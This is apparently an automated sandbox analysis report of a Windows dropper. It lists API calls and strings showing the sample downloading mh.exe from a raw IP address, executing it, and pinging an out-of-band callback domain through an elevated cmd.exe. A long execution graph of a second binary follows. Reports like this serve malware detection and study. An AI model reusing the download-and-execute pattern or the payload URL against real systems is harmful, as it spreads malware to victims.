      • Associated: 00000000.00000002.2157959244.0000000000400000.00000080.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_dr0p.jbxd
      Similarity
      • API ID: CloseFileHandleInternet$ExecuteOpenShelllstrcat$CreateFolderPathReadWriteexit
      • String ID: /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun$Mozilla/5.0$cmd.exe$http://23.27.51.244/mh.exe$mh.exe$msvcrt$runas$.#v
      • API String ID: 75222691-138514472
      • Opcode ID: 11187015aa9f1c8ff3267cf0e5e2bb0dd4915e9e45076821679b835671d4d3dc
      • Instruction ID: 8ba6e673de7eaabc5c7a98d1382b7a1bd1208fb1d617d2ae6d2a9a6864d9d083
      • Opcode Fuzzy Hash: 11187015aa9f1c8ff3267cf0e5e2bb0dd4915e9e45076821679b835671d4d3dc
      • Instruction Fuzzy Hash: 39218075B4123CBEE73097A19C89FBB7EACDF05790F900062B504A2152C7B95D51CAF8

      Control-flow Graph

      APIs
      • LoadLibraryA.KERNELBASE(msvcrt), ref: 0042005D
      • InternetOpenA.WININET(Mozilla/5.0,00000000,00000000,00000000,00000000), ref: 0042008B
      • InternetOpenUrlA.WININET(00000000,http://23.27.51.244/mh.exe,00000000,00000000,84083000,00000000), ref: 004200A9
      • SHGetFolderPathA.SHELL32(00000000,00000007,00000000,00000000,?), ref: 004200C5
      • lstrcat.KERNEL32(?,0042019C), ref: 004200F2
      • lstrcat.KERNEL32(00000000), ref: 004200F5
      • CreateFileA.KERNELBASE(00000000), ref: 004200F8
      • CloseHandle.KERNELBASE(00000000), ref: 0042013F
      • CloseHandle.KERNELBASE(00000000), ref: 00420142
      • CloseHandle.KERNELBASE(00000000), ref: 00420145
      • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 0042015C
      • ShellExecuteA.SHELL32(00000000,runas,cmd.exe,/c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun,00000000,00000000), ref: 00420170
      • exit.MSVCRT ref: 00420173
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2157971429.0000000000420000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.2157959244.0000000000400000.00000080.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_dr0p.jbxd
      Similarity
      • API ID: CloseHandle$ExecuteInternetOpenShelllstrcat$CreateFileFolderLibraryLoadPathexit
      • String ID: /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun$Mozilla/5.0$cmd.exe$http://23.27.51.244/mh.exe$mh.exe$msvcrt$runas$.#v
      • API String ID: 4046907231-138514472
      • Opcode ID: e92293144b82b5edbb5eef74653ec4b7faee84ad3c7dee7f2b6cd7358a6f4e55
      • Instruction ID: b5b0c48799610328507188cbf7613ddd7993b24ffb9f5e1b125bd4a09e144e19
      • Opcode Fuzzy Hash: e92293144b82b5edbb5eef74653ec4b7faee84ad3c7dee7f2b6cd7358a6f4e55
      • Instruction Fuzzy Hash: 4631A071740228BFD7209F15DC89F6B7FECEF05754F8140A6B80493253CA79AC11CAA8

      Execution Graph

      Execution Coverage:12.2%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:27.8%
      Total number of Nodes:2000
      Total number of Limit Nodes:27
      execution_graph 27960 7ff741ec20f0 27961 7ff741ec2106 _com_error::_com_error 27960->27961 27962 7ff741ec4078 Concurrency::cancel_current_task 2 API calls 27961->27962 27963 7ff741ec2117 27962->27963 27964 7ff741ec1900 _com_raise_error 14 API calls 27963->27964 27965 7ff741ec2163 27964->27965 28392 7ff741ec03e0 28393 7ff741ec041f 28392->28393 28394 7ff741ec0497 28392->28394 28396 7ff741eaaae0 48 API calls 28393->28396 28395 7ff741eaaae0 48 API calls 28394->28395 28397 7ff741ec04ab 28395->28397 28398 7ff741ec0433 28396->28398 28399 7ff741eada98 48 API calls 28397->28399 28400 7ff741eada98 48 API calls 28398->28400 28403 7ff741ec0442 BuildCatchObjectHelperInternal 28399->28403 28400->28403 28401 7ff741e91fa0 31 API calls 28402 7ff741ec0541 28401->28402 28405 7ff741e9250c SetDlgItemTextW 28402->28405 28403->28401 28404 7ff741ec05c6 28403->28404 28406 7ff741ec05cc 28403->28406 28407 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 28404->28407 28409 7ff741ec0556 SetWindowTextW 28405->28409 28408 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 28406->28408 28407->28406 28410 7ff741ec05d2 28408->28410 28411 7ff741ec059c 28409->28411 28412 7ff741ec056f 28409->28412 28413 7ff741ec2320 _handle_error 8 API calls 28411->28413 28412->28411 28414 7ff741ec05c1 28412->28414 28415 7ff741ec05af 28413->28415 28416 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 28414->28416 28416->28404 27869 7ff741ec11cf 27870 7ff741ec1102 27869->27870 27870->27869 27872 7ff741ec1900 27870->27872 27898 7ff741ec1558 27872->27898 27875 7ff741ec198b 27876 7ff741ec1868 DloadReleaseSectionWriteAccess 6 API calls 27875->27876 27877 7ff741ec1998 RaiseException 27876->27877 27891 7ff741ec1bb5 27877->27891 27878 7ff741ec1a3d LoadLibraryExA 27880 7ff741ec1a54 GetLastError 27878->27880 27881 7ff741ec1aa9 27878->27881 27879 7ff741ec1b85 27906 7ff741ec1868 27879->27906 27885 7ff741ec1a7e 27880->27885 27890 7ff741ec1a69 27880->27890 27882 7ff741ec1abd 27881->27882 27886 7ff741ec1ab4 FreeLibrary 27881->27886 27882->27879 27884 7ff741ec1b1b GetProcAddress 27882->27884 27883 7ff741ec19b4 27883->27878 27883->27879 27883->27881 27883->27882 27884->27879 27889 7ff741ec1b30 GetLastError 27884->27889 27888 7ff741ec1868 DloadReleaseSectionWriteAccess 6 API calls 27885->27888 27886->27882 27892 7ff741ec1a8b RaiseException 27888->27892 27893 7ff741ec1b45 27889->27893 27890->27881 27890->27885 27891->27870 27892->27891 27893->27879 27894 7ff741ec1868 DloadReleaseSectionWriteAccess 6 API calls 27893->27894 27895 7ff741ec1b67 RaiseException 27894->27895 27896 7ff741ec1558 _com_raise_error 6 API calls 27895->27896 27897 7ff741ec1b81 27896->27897 27897->27879 27899 7ff741ec156e 27898->27899 27905 7ff741ec15d3 27898->27905 27914 7ff741ec1604 27899->27914 27902 7ff741ec15ce 27904 7ff741ec1604 DloadReleaseSectionWriteAccess 3 API calls 27902->27904 27904->27905 27905->27875 27905->27883 27907 7ff741ec1878 27906->27907 27913 7ff741ec18d1 27906->27913 27908 7ff741ec1604 DloadReleaseSectionWriteAccess 3 API calls 27907->27908 27909 7ff741ec187d 27908->27909 27910 7ff741ec18cc 27909->27910 27911 7ff741ec17d8 DloadProtectSection 3 API calls 27909->27911 27912 7ff741ec1604 DloadReleaseSectionWriteAccess 3 API calls 27910->27912 27911->27910 27912->27913 27913->27891 27915 7ff741ec161f 27914->27915 27916 7ff741ec1573 27914->27916 27915->27916 27917 7ff741ec1624 GetModuleHandleW 27915->27917 27916->27902 27921 7ff741ec17d8 27916->27921 27918 7ff741ec1639 27917->27918 27919 7ff741ec163e GetProcAddress 27917->27919 27918->27916 27919->27918 27920 7ff741ec1653 GetProcAddress 27919->27920 27920->27918 27922 7ff741ec17fa DloadProtectSection 27921->27922 27923 7ff741ec1802 27922->27923 27924 7ff741ec183a VirtualProtect 27922->27924 27926 7ff741ec16a4 VirtualQuery GetSystemInfo 27922->27926 27923->27902 27924->27923 27926->27924 25395 7ff741ebb190 25738 7ff741e9255c 25395->25738 25397 7ff741ebb1db 25398 7ff741ebb1ef 25397->25398 25399 7ff741ebbe93 25397->25399 25401 7ff741ebb20c 25397->25401 25398->25401 25403 7ff741ebb1ff 25398->25403 25404 7ff741ebb2db 25398->25404 26030 7ff741ebf390 25399->26030 26118 7ff741ec2320 25401->26118 25408 7ff741ebb2a9 25403->25408 25409 7ff741ebb207 25403->25409 25411 7ff741ebb391 25404->25411 25416 7ff741ebb2f5 25404->25416 25406 7ff741ebbeba SendMessageW 25407 7ff741ebbec9 25406->25407 25413 7ff741ebbef0 GetDlgItem SendMessageW 25407->25413 25414 7ff741ebbed5 SendDlgItemMessageW 25407->25414 25408->25401 25415 7ff741ebb2cb EndDialog 25408->25415 25409->25401 25419 7ff741eaaae0 48 API calls 25409->25419 25746 7ff741e922bc GetDlgItem 25411->25746 26049 7ff741ea62dc GetCurrentDirectoryW 25413->26049 25414->25413 25415->25401 25420 7ff741eaaae0 48 API calls 25416->25420 25423 7ff741ebb236 25419->25423 25424 7ff741ebb313 SetDlgItemTextW 25420->25424 25421 7ff741ebb3b1 EndDialog 25597 7ff741ebb3da 25421->25597 25422 7ff741ebbf47 GetDlgItem 26059 7ff741e92520 25422->26059 26063 7ff741e91ec4 34 API calls _handle_error 25423->26063 25428 7ff741ebb326 25424->25428 25427 7ff741ebb408 GetDlgItem 25432 7ff741ebb422 SendMessageW SendMessageW 25427->25432 25433 7ff741ebb44f SetFocus 25427->25433 25428->25401 25434 7ff741ebb340 GetMessageW 25428->25434 25431 7ff741ebb246 25438 7ff741ebb25c 25431->25438 26064 7ff741e9250c 25431->26064 25432->25433 25435 7ff741ebb4f2 25433->25435 25436 7ff741ebb465 25433->25436 25434->25401 25440 7ff741ebb35e IsDialogMessageW 25434->25440 25760 7ff741e98d04 25435->25760 25441 7ff741eaaae0 48 API calls 25436->25441 25438->25401 25452 7ff741ebc363 25438->25452 25440->25428 25447 7ff741ebb373 TranslateMessage DispatchMessageW 25440->25447 25448 7ff741ebb46f 25441->25448 25442 7ff741ebbcc5 25449 7ff741eaaae0 48 API calls 25442->25449 25443 7ff741e91fa0 31 API calls 25443->25401 25446 7ff741ebb52c 25770 7ff741ebef80 25446->25770 25447->25428 26067 7ff741e9129c 25448->26067 25453 7ff741ebbcd6 SetDlgItemTextW 25449->25453 26127 7ff741ec7904 25452->26127 25457 7ff741eaaae0 48 API calls 25453->25457 25463 7ff741ebbd08 25457->25463 25478 7ff741e9129c 33 API calls 25463->25478 25464 7ff741ebc368 25473 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25464->25473 25467 7ff741ebb498 25471 7ff741ebf0a4 24 API calls 25467->25471 25476 7ff741ebb4a5 25471->25476 25479 7ff741ebc36e 25473->25479 25476->25464 25493 7ff741ebb4e8 25476->25493 25511 7ff741ebbd31 25478->25511 25491 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25479->25491 25490 7ff741ebbdda 25495 7ff741eaaae0 48 API calls 25490->25495 25496 7ff741ebc374 25491->25496 25492 7ff741ebb5ec 25504 7ff741ebb61a 25492->25504 26078 7ff741ea32a8 25492->26078 25493->25492 26077 7ff741ebfa80 33 API calls 2 library calls 25493->26077 25506 7ff741ebbde4 25495->25506 25514 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25496->25514 25499 7ff741e91fa0 31 API calls 25509 7ff741ebb586 25499->25509 25808 7ff741ea2f58 25504->25808 25527 7ff741e9129c 33 API calls 25506->25527 25509->25479 25509->25493 25511->25490 25516 7ff741e9129c 33 API calls 25511->25516 25521 7ff741ebc37a 25514->25521 25522 7ff741ebbd7f 25516->25522 25532 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25521->25532 25528 7ff741eaaae0 48 API calls 25522->25528 25525 7ff741ebb634 GetLastError 25526 7ff741ebb64c 25525->25526 25820 7ff741ea7fc4 25526->25820 25531 7ff741ebbe0d 25527->25531 25534 7ff741ebbd8a 25528->25534 25530 7ff741ebb60e 26081 7ff741eb9d90 12 API calls _handle_error 25530->26081 25548 7ff741e9129c 33 API calls 25531->25548 25538 7ff741ebc380 25532->25538 25540 7ff741e91150 33 API calls 25534->25540 25549 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25538->25549 25544 7ff741ebbda2 25540->25544 25542 7ff741ebb65e 25546 7ff741ebb665 GetLastError 25542->25546 25547 7ff741ebb674 25542->25547 26114 7ff741e92034 25544->26114 25546->25547 25552 7ff741ebb72b 25547->25552 25554 7ff741ebb68b GetTickCount 25547->25554 25640 7ff741ebb71c 25547->25640 25555 7ff741ebbe4e 25548->25555 25551 7ff741ebc386 25549->25551 25556 7ff741e9255c 61 API calls 25551->25556 25557 7ff741ebba50 25552->25557 26082 7ff741ea6454 25552->26082 25823 7ff741e94228 25554->25823 25566 7ff741e91fa0 31 API calls 25555->25566 25560 7ff741ebc3e4 25556->25560 25557->25421 26109 7ff741e9bd0c 33 API calls 25557->26109 25558 7ff741ebbdbe 25563 7ff741e91fa0 31 API calls 25558->25563 25567 7ff741ebc3e8 25560->25567 25573 7ff741ebc489 GetDlgItem SetFocus 25560->25573 25598 7ff741ebc3fd 25560->25598 25569 7ff741ebbdcc 25563->25569 25572 7ff741ebbe78 25566->25572 25574 7ff741ec2320 _handle_error 8 API calls 25567->25574 25568 7ff741ebb74e 26094 7ff741eab914 102 API calls 25568->26094 25577 7ff741e91fa0 31 API calls 25569->25577 25571 7ff741ebba75 26110 7ff741e91150 25571->26110 25582 7ff741e91fa0 31 API calls 25572->25582 25578 7ff741ebc4ba 25573->25578 25583 7ff741ebca97 25574->25583 25577->25490 25591 7ff741e9129c 33 API calls 25578->25591 25579 7ff741ebb6ba 25833 7ff741e91fa0 25579->25833 25580 7ff741ebbb79 25586 7ff741eaaae0 48 API calls 25580->25586 25588 7ff741ebbe83 25582->25588 25584 7ff741ebb768 25590 7ff741eada98 48 API calls 25584->25590 25593 7ff741ebbba7 SetDlgItemTextW 25586->25593 25587 7ff741ebba8a 25594 7ff741eaaae0 48 API calls 25587->25594 25595 7ff741e91fa0 31 API calls 25588->25595 25589 7ff741ebc434 SendDlgItemMessageW 25599 7ff741ebc454 25589->25599 25600 7ff741ebc45d EndDialog 25589->25600 25601 7ff741ebb7aa GetCommandLineW 25590->25601 25602 7ff741ebc4cc 25591->25602 25592 7ff741ebb6c8 25838 7ff741ea2134 25592->25838 25603 7ff741e92534 25593->25603 25596 7ff741ebba97 25594->25596 25595->25597 25605 7ff741e91150 33 API calls 25596->25605 25597->25443 25598->25567 25598->25589 25599->25600 25600->25567 25606 7ff741ebb84f 25601->25606 25607 7ff741ebb869 25601->25607 26132 7ff741ea80d8 33 API calls 25602->26132 25604 7ff741ebbbc5 SetDlgItemTextW GetDlgItem 25603->25604 25609 7ff741ebbbf0 GetWindowLongPtrW SetWindowLongPtrW 25604->25609 25610 7ff741ebbc13 25604->25610 25611 7ff741ebbaaa 25605->25611 26095 7ff741e920b0 25606->26095 26099 7ff741ebab54 SHGetFolderPathW 25607->26099 25609->25610 25861 7ff741ebce88 25610->25861 25616 7ff741e91fa0 31 API calls 25611->25616 25612 7ff741ebc4e0 25617 7ff741e9250c SetDlgItemTextW 25612->25617 25623 7ff741ebbab5 25616->25623 25625 7ff741ebc4f4 25617->25625 25620 7ff741ebb6f5 GetLastError 25621 7ff741ebb704 25620->25621 25854 7ff741ea204c 25621->25854 25629 7ff741e91fa0 31 API calls 25623->25629 25634 7ff741ebc526 SendDlgItemMessageW FindFirstFileW 25625->25634 25626 7ff741ebab54 34 API calls 25630 7ff741ebb88b 25626->25630 25628 7ff741ebce88 163 API calls 25632 7ff741ebbc3c 25628->25632 25633 7ff741ebbac3 25629->25633 25635 7ff741ebab54 34 API calls 25630->25635 26015 7ff741ebf974 25632->26015 25644 7ff741eaaae0 48 API calls 25633->25644 25638 7ff741ebc57b 25634->25638 25731 7ff741ebca04 25634->25731 25639 7ff741ebb89c 25635->25639 25649 7ff741eaaae0 48 API calls 25638->25649 26105 7ff741eab9b4 102 API calls 25639->26105 25640->25552 25640->25580 25643 7ff741ebce88 163 API calls 25660 7ff741ebbc6a 25643->25660 25648 7ff741ebbadb 25644->25648 25645 7ff741ebb8b3 26106 7ff741ebfbdc 33 API calls 25645->26106 25646 7ff741ebca81 25646->25567 25647 7ff741ebcaa9 25651 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25647->25651 25661 7ff741e9129c 33 API calls 25648->25661 25653 7ff741ebc59e 25649->25653 25655 7ff741ebcaae 25651->25655 25652 7ff741ebbc96 26029 7ff741e92298 GetDlgItem EnableWindow 25652->26029 25663 7ff741e9129c 33 API calls 25653->25663 25654 7ff741ebb8d2 CreateFileMappingW 25657 7ff741ebb911 MapViewOfFile 25654->25657 25658 7ff741ebb953 ShellExecuteExW 25654->25658 25664 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25655->25664 26107 7ff741ec3640 25657->26107 25678 7ff741ebb974 25658->25678 25660->25652 25665 7ff741ebce88 163 API calls 25660->25665 25673 7ff741ebbb04 25661->25673 25662 7ff741ebb3f5 25662->25421 25662->25442 25666 7ff741ebc5cd 25663->25666 25667 7ff741ebcab4 25664->25667 25665->25652 25668 7ff741e91150 33 API calls 25666->25668 25671 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25667->25671 25669 7ff741ebc5e8 25668->25669 26133 7ff741e9e164 33 API calls 2 library calls 25669->26133 25670 7ff741ebb9c3 25679 7ff741ebb9ef 25670->25679 25680 7ff741ebb9dc UnmapViewOfFile CloseHandle 25670->25680 25675 7ff741ebcaba 25671->25675 25672 7ff741ebbb5a 25676 7ff741e91fa0 31 API calls 25672->25676 25673->25521 25673->25672 25683 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25675->25683 25676->25421 25677 7ff741ebc5ff 25681 7ff741e91fa0 31 API calls 25677->25681 25678->25670 25685 7ff741ebb9b1 Sleep 25678->25685 25679->25496 25682 7ff741ebba25 25679->25682 25680->25679 25684 7ff741ebc60c 25681->25684 25687 7ff741e91fa0 31 API calls 25682->25687 25686 7ff741ebcac0 25683->25686 25684->25655 25689 7ff741e91fa0 31 API calls 25684->25689 25685->25670 25685->25678 25690 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25686->25690 25688 7ff741ebba42 25687->25688 25691 7ff741e91fa0 31 API calls 25688->25691 25692 7ff741ebc673 25689->25692 25693 7ff741ebcac6 25690->25693 25691->25557 25694 7ff741e9250c SetDlgItemTextW 25692->25694 25696 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25693->25696 25695 7ff741ebc687 FindClose 25694->25695 25697 7ff741ebc6a3 25695->25697 25698 7ff741ebc797 SendDlgItemMessageW 25695->25698 25699 7ff741ebcacc 25696->25699 26134 7ff741eba2cc 10 API calls _handle_error 25697->26134 25700 7ff741ebc7cb 25698->25700 25703 7ff741eaaae0 48 API calls 25700->25703 25702 7ff741ebc6c6 25704 7ff741eaaae0 48 API calls 25702->25704 25705 7ff741ebc7d8 25703->25705 25706 7ff741ebc6cf 25704->25706 25708 7ff741e9129c 33 API calls 25705->25708 25707 7ff741eada98 48 API calls 25706->25707 25713 7ff741ebc6ec BuildCatchObjectHelperInternal 25707->25713 25710 7ff741ebc807 25708->25710 25709 7ff741e91fa0 31 API calls 25711 7ff741ebc783 25709->25711 25712 7ff741e91150 33 API calls 25710->25712 25714 7ff741e9250c SetDlgItemTextW 25711->25714 25715 7ff741ebc822 25712->25715 25713->25667 25713->25709 25714->25698 26135 7ff741e9e164 33 API calls 2 library calls 25715->26135 25717 7ff741ebc839 25718 7ff741e91fa0 31 API calls 25717->25718 25719 7ff741ebc845 BuildCatchObjectHelperInternal 25718->25719 25720 7ff741e91fa0 31 API calls 25719->25720 25721 7ff741ebc87f 25720->25721 25722 7ff741e91fa0 31 API calls 25721->25722 25723 7ff741ebc88c 25722->25723 25723->25675 25724 7ff741e91fa0 31 API calls 25723->25724 25725 7ff741ebc8f3 25724->25725 25726 7ff741e9250c SetDlgItemTextW 25725->25726 25727 7ff741ebc907 25726->25727 25727->25731 26136 7ff741eba2cc 10 API calls _handle_error 25727->26136 25729 7ff741ebc932 25730 7ff741eaaae0 48 API calls 25729->25730 25732 7ff741ebc93c 25730->25732 25731->25567 25731->25646 25731->25647 25731->25693 25733 7ff741eada98 48 API calls 25732->25733 25735 7ff741ebc959 BuildCatchObjectHelperInternal 25733->25735 25734 7ff741e91fa0 31 API calls 25736 7ff741ebc9f0 25734->25736 25735->25686 25735->25734 25737 7ff741e9250c SetDlgItemTextW 25736->25737 25737->25731 25739 7ff741e925d0 25738->25739 25740 7ff741e9256a 25738->25740 25739->25397 25740->25739 26137 7ff741eaa4ac 25740->26137 25742 7ff741e9258f 25742->25739 25743 7ff741e925a4 GetDlgItem 25742->25743 25743->25739 25744 7ff741e925b7 25743->25744 25744->25739 25745 7ff741e925be SetWindowTextW 25744->25745 25745->25739 25747 7ff741e92334 25746->25747 25748 7ff741e922fc 25746->25748 26236 7ff741e923f8 GetWindowTextLengthW 25747->26236 25750 7ff741e9129c 33 API calls 25748->25750 25751 7ff741e9232a BuildCatchObjectHelperInternal 25750->25751 25752 7ff741e91fa0 31 API calls 25751->25752 25755 7ff741e92389 25751->25755 25752->25755 25753 7ff741e923c8 25754 7ff741ec2320 _handle_error 8 API calls 25753->25754 25756 7ff741e923dd 25754->25756 25755->25753 25757 7ff741e923f0 25755->25757 25756->25421 25756->25427 25756->25662 25758 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25757->25758 25759 7ff741e923f5 25758->25759 25762 7ff741e98d34 25760->25762 25768 7ff741e98de8 25760->25768 25764 7ff741e98d91 25762->25764 25765 7ff741e98de3 25762->25765 25767 7ff741e98d42 BuildCatchObjectHelperInternal 25762->25767 25764->25767 25769 7ff741ec21d0 33 API calls 25764->25769 26280 7ff741e91f80 33 API calls 3 library calls 25765->26280 25767->25446 26281 7ff741e92004 33 API calls std::_Xinvalid_argument 25768->26281 25769->25767 25774 7ff741ebefb0 25770->25774 25771 7ff741ec2320 _handle_error 8 API calls 25772 7ff741ebb537 25771->25772 25784 7ff741eaaae0 25772->25784 25773 7ff741ebefd7 25773->25771 25774->25773 26282 7ff741e9bd0c 33 API calls 25774->26282 25776 7ff741ebf02a 25777 7ff741e91150 33 API calls 25776->25777 25778 7ff741ebf03f 25777->25778 25779 7ff741e91fa0 31 API calls 25778->25779 25781 7ff741ebf04f BuildCatchObjectHelperInternal 25778->25781 25779->25781 25780 7ff741e91fa0 31 API calls 25782 7ff741ebf076 25780->25782 25781->25780 25783 7ff741e91fa0 31 API calls 25782->25783 25783->25773 25785 7ff741eaaaf3 25784->25785 26283 7ff741ea9774 25785->26283 25788 7ff741eaab86 25791 7ff741eada98 25788->25791 25789 7ff741eaab58 LoadStringW 25789->25788 25790 7ff741eaab71 LoadStringW 25789->25790 25790->25788 26302 7ff741ead874 25791->26302 25794 7ff741ebf0a4 26336 7ff741ebae1c PeekMessageW 25794->26336 25797 7ff741ebf0f5 25801 7ff741ebf101 ShowWindow SendMessageW SendMessageW 25797->25801 25798 7ff741ebf143 SendMessageW SendMessageW 25799 7ff741ebf1a4 SendMessageW 25798->25799 25800 7ff741ebf189 25798->25800 25802 7ff741ebf1c6 SendMessageW SendMessageW 25799->25802 25803 7ff741ebf1c3 25799->25803 25800->25799 25801->25798 25804 7ff741ebf1f3 SendMessageW 25802->25804 25805 7ff741ebf218 SendMessageW 25802->25805 25803->25802 25804->25805 25806 7ff741ec2320 _handle_error 8 API calls 25805->25806 25807 7ff741ebb578 25806->25807 25807->25499 25809 7ff741ea309d 25808->25809 25813 7ff741ea2f8e 25808->25813 25810 7ff741ec2320 _handle_error 8 API calls 25809->25810 25811 7ff741ea30b3 25810->25811 25811->25525 25811->25526 25812 7ff741ea3077 25812->25809 25814 7ff741ea3684 56 API calls 25812->25814 25813->25812 25815 7ff741e9129c 33 API calls 25813->25815 25817 7ff741ea30c8 25813->25817 26341 7ff741ea3684 25813->26341 25814->25809 25815->25813 25818 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25817->25818 25819 7ff741ea30cd 25818->25819 25821 7ff741ea7fcf 25820->25821 25822 7ff741ea7fd2 SetCurrentDirectoryW 25820->25822 25821->25822 25822->25542 25824 7ff741e94255 25823->25824 25825 7ff741e9426a 25824->25825 25826 7ff741e9129c 33 API calls 25824->25826 25827 7ff741ec2320 _handle_error 8 API calls 25825->25827 25826->25825 25828 7ff741e942a1 25827->25828 25829 7ff741e93c84 25828->25829 25830 7ff741e93cab 25829->25830 26474 7ff741e9710c 25830->26474 25832 7ff741e93cbb BuildCatchObjectHelperInternal 25832->25579 25834 7ff741e91fb3 25833->25834 25835 7ff741e91fdc 25833->25835 25834->25835 25836 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25834->25836 25835->25592 25837 7ff741e92000 25836->25837 25841 7ff741ea216a 25838->25841 25839 7ff741ea219e 25842 7ff741ea6a0c 49 API calls 25839->25842 25850 7ff741ea227f 25839->25850 25840 7ff741ea21b1 CreateFileW 25840->25839 25841->25839 25841->25840 25845 7ff741ea2209 25842->25845 25843 7ff741ea22af 25844 7ff741ec2320 _handle_error 8 API calls 25843->25844 25847 7ff741ea22c4 25844->25847 25848 7ff741ea2246 25845->25848 25849 7ff741ea220d CreateFileW 25845->25849 25846 7ff741e920b0 33 API calls 25846->25843 25847->25620 25847->25621 25848->25850 25851 7ff741ea22d8 25848->25851 25849->25848 25850->25843 25850->25846 25852 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25851->25852 25853 7ff741ea22dd 25852->25853 25855 7ff741ea2066 25854->25855 25856 7ff741ea2077 25854->25856 25855->25856 25857 7ff741ea2072 25855->25857 25858 7ff741ea2079 25855->25858 26486 7ff741ea22e0 25857->26486 26490 7ff741ea20d0 25858->26490 26497 7ff741ebaa08 25861->26497 25863 7ff741ebd1ee 25864 7ff741e91fa0 31 API calls 25863->25864 25865 7ff741ebd1f7 25864->25865 25866 7ff741ec2320 _handle_error 8 API calls 25865->25866 25868 7ff741ebbc2b 25866->25868 25867 7ff741ead22c 33 API calls 26006 7ff741ebcf03 BuildCatchObjectHelperInternal 25867->26006 25868->25628 25869 7ff741ebeefa 26654 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 25869->26654 25872 7ff741ebef00 26655 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 25872->26655 25875 7ff741ebef06 25877 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25875->25877 25876 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25878 7ff741ebeef4 25876->25878 25879 7ff741ebef0c 25877->25879 26653 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 25878->26653 25882 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25879->25882 25883 7ff741ebef12 25882->25883 25884 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25883->25884 25888 7ff741ebef18 25884->25888 25885 7ff741e913a4 33 API calls 25889 7ff741ebdc3a GetTempPathW 25885->25889 25886 7ff741e920b0 33 API calls 25887 7ff741ebee77 25886->25887 26650 7ff741ebabe8 33 API calls 3 library calls 25887->26650 25896 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25888->25896 25889->26006 25890 7ff741ea62dc 35 API calls 25890->26006 25894 7ff741ebeeee 25894->25876 25895 7ff741ebee8d 25905 7ff741e91fa0 31 API calls 25895->25905 25908 7ff741ebeea4 BuildCatchObjectHelperInternal 25895->25908 25902 7ff741ebef1e 25896->25902 25897 7ff741e92520 SetWindowTextW 25897->26006 25899 7ff741ebeee8 26652 7ff741e92004 33 API calls std::_Xinvalid_argument 25899->26652 25901 7ff741ecbb8c 43 API calls 25901->26006 25910 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25902->25910 25904 7ff741ebe7f3 25904->25899 25907 7ff741ec21d0 33 API calls 25904->25907 25909 7ff741ebeed2 25904->25909 25918 7ff741ebe83b BuildCatchObjectHelperInternal 25904->25918 25905->25908 25906 7ff741e91fa0 31 API calls 25906->25909 25907->25918 25908->25906 26651 7ff741e91f80 33 API calls 3 library calls 25909->26651 25912 7ff741ebef24 25910->25912 25911 7ff741ebaa08 33 API calls 25911->26006 25917 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25912->25917 25914 7ff741ebef6c 26658 7ff741e92004 33 API calls std::_Xinvalid_argument 25914->26658 25915 7ff741e920b0 33 API calls 25915->26006 25916 7ff741ebef78 26660 7ff741e92004 33 API calls std::_Xinvalid_argument 25916->26660 25921 7ff741ebef2a 25917->25921 25927 7ff741e920b0 33 API calls 25918->25927 25970 7ff741ebeb8f 25918->25970 25920 7ff741e91fa0 31 API calls 25925 7ff741ebee4a 25920->25925 25933 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25921->25933 25922 7ff741ebef72 26659 7ff741e91f80 33 API calls 3 library calls 25922->26659 25923 7ff741e920b0 33 API calls 26008 7ff741ebd489 25923->26008 25925->25886 25925->25909 25926 7ff741ebef66 26657 7ff741e91f80 33 API calls 3 library calls 25926->26657 25934 7ff741ebe963 25927->25934 25930 7ff741ebed40 25930->25916 25930->25922 25949 7ff741ebed3b BuildCatchObjectHelperInternal 25930->25949 25954 7ff741ec21d0 33 API calls 25930->25954 25932 7ff741ebec2a 25932->25914 25932->25926 25943 7ff741ebec72 BuildCatchObjectHelperInternal 25932->25943 25932->25949 25951 7ff741ec21d0 33 API calls 25932->25951 25939 7ff741ebef30 25933->25939 25941 7ff741ebef60 25934->25941 25950 7ff741e9129c 33 API calls 25934->25950 25935 7ff741e92674 31 API calls 25935->26006 25938 7ff741eb99c8 31 API calls 25938->26006 25955 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25939->25955 25940 7ff741e9e164 33 API calls 25940->26006 26656 7ff741e9704c 47 